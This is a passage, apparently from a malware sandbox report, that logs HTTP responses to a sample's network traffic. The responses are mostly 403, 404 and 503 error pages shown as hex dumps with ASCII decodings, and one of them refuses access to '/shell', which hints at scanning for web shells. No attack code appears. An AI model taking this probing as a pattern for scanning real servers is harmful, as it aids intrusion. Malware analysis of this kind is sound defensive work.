74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:09:09 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 01 Nov 2021 09:09:10 GMTServer: LiteSpeedData Raw: 32 37 35 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiDate: Mon, 01 Nov 2021 09:09:10 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ZTE web server 1.0 ZTE corp 2015.Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINContent-Type: text/html; charset=iso-8859-1X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 01 Nov 2021 09:09:10 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:11 GMTServer: ApacheLast-Modified: Wed, 02 Aug 2017 08:47:14 GMTAccept-Ranges: bytesContent-Length: 1242Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:09:12 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:09:12 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Content-Type: text/html; charset=iso-8859-1Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL was not found on this server.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:16 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:04:04 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbidden
